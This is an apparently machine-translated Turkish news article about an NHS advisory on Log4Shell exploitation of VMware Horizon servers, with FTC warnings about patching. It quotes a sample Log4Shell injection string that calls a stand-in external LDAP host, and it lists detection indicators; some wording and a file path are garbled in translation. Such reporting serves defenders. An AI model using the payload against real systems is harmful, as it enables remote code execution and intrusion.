İngiliz ve ABD'li yetkililer, kritik Log4j hatalarına eğilimli yama sistemleri uyarıyor

Getty Resimleri

Kamu tarafından finanse edilen Birleşik Krallık sağlık sistemi, suçluların, etkilenen sistemler üzerinde tam kontrol elde etmelerini sağlayan kötü amaçlı yazılım yüklemek için VMware Horizon çalıştıran sunuculardaki yüksek seviyeli Log4Shell güvenlik açığından aktif olarak yararlandıkları konusunda uyarıyor.

CVE-2021-44228, son yıllarda ortaya çıkan en ciddi güvenlik açıklarından biridir. Milyonlarca olmasa da binlerce üçüncü taraf uygulamasında ve web sitesinde kullanılan bir sistem günlüğü kodu kitaplığı olan Log4J’de bulunur. Bu, büyük bir savunmasız sistem tabanı olduğu anlamına gelir. Ek olarak, güvenlik açığından yararlanmak son derece kolaydır ve saldırganların, saldırıya uğramış sunucularda yüksek ayrıcalıklı komutları yürütmek için bir komut penceresi sağlayan web kabukları yüklemesine olanak tanır.

Log4J’deki uzaktan kod yürütme hatası, bir yama kullanıma sunulmadan önce yararlanma kodunun yayınlanmasından sonra Aralık ayında keşfedildi. Kötü niyetli bilgisayar korsanları, hassas sistemleri tehlikeye atmak için CVE-2021-44228’den hızla yararlanmaya başladı.

VMware Horizon dahil olmak üzere saldırılar o zamandan beri devam etti.

İngiltere Ulusal Sağlık Sisteminden yetkililer, “Etkilenen ağlarda kalıcı olmak için Log4Shell güvenlik açıklarından etkilenen sürümleri çalıştıran VMware Horizon sunucularını hedef alan bilinmeyen bir tehdit grubu gözlemlendi” diye yazdı. Etkilenen kuruluşların tehdidi azaltmak için atabilecekleri belirli adımlar konusunda rehberlik sağlamaya devam ettiler.

Her şeyden önce, VMware’in Horizon ürünü için yayınladığı ve şirkete masaüstü ve uygulama işlevlerini şirketin sanallaştırma teknolojisiyle sanallaştırma yeteneği veren bir güncelleme yükleme önerisidir. NHS yetkilileri, risk altındaki kuruluşların maruz kalmış olabilecekleri olası saldırıları tespit etmek için arayabileceklerine dair işaretler de kaydetti.

Öneri, Federal Ticaret Komisyonu’nun tüketiciye yönelik şirketleri Equifax’ın kaderini önlemek için savunmasız sistemleri düzeltmeleri konusunda uyarmasından bir gün sonra geldi. 2019 yılında kredi bürosu, Apache Struts adlı başka bir yazılımda benzer şekilde ciddi bir güvenlik açığının yamalanmaması nedeniyle FTC ücretlerini ödemek için 575 milyon dolar ödemeyi kabul etti. Bilinmeyen bir saldırgan, Equifax ağındaki bir güvenlik açığından yararlandığında, 143 milyon kişinin hassas verilerini tehlikeye attı ve bu, onu tüm zamanların en kötü veri ihlallerinden biri haline getirdi.

FTC yetkilileri, “FTC, tüketici verilerini Log4j veya benzer bilinen güvenlik açıkları yoluyla ifşa etmekten korumak için gelecekte makul adımlar atmayan şirketleri kovuşturmak için tüm yasal yetkilerini kullanmayı planlıyor.” Dedi.

NHS, bir VMware ürününü hedefleyen istismarları gözlemleyen en azından ikinci kuruluştur. Geçen ay araştırmacılar, saldırganların Conti fidye yazılımını yüklemek için VMware VCenter çalıştıran sistemleri hedeflediğini bildirdi.

Yama uygulanmamış VMware Horizon sunucularına yönelik saldırılar, açık kaynaklı bir hizmetin kullanımına yöneliktir.

NHS danışmanı, “Saldırı büyük olasılıkla $ {jndi: ldap: //example.com} benzeri bir Log4Shell yükü aracılığıyla başlatılacak” dedi. “Saldırı, VMware Horizon’a gömülü olan Apache Tomcat hizmetindeki Log4Shell güvenlik açığını kullanıyor. Bu daha sonra ws_TomcatService.exe tarafından oluşturulan aşağıdaki PowerShell komutunu başlatır: “

NHS

Birkaç ek adımdan sonra saldırganlar, kontrol ettikleri bir sunucuyla kalıcı olarak iletişim kuran bir web kabuğu kurabilirler. İşte saldırının bir temsili:

NHS

Not ekledi:

Kuruluşlar aşağıdakilere dikkat etmelidir:

  • Kanıtlar ws_TomcatService.exe anormal süreçler üretmek
  • Herhangi powershell.exe Komut satırında ‘VMBlastSG’ içeren işlemler
  • Dosya değişiklikleri ‘… VMware VMware View Server appblastgateway lib absg-worker.js’ – Bu dosyanın üzerine genellikle yazılır ve yükseltmeler sırasında değiştirilmez

Güvenlik şirketi Praetorian, bu aracı, savunmasız sistemlerin geniş çapta tanımlanması için Cuma günü yayınladı.

Bir cevap yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir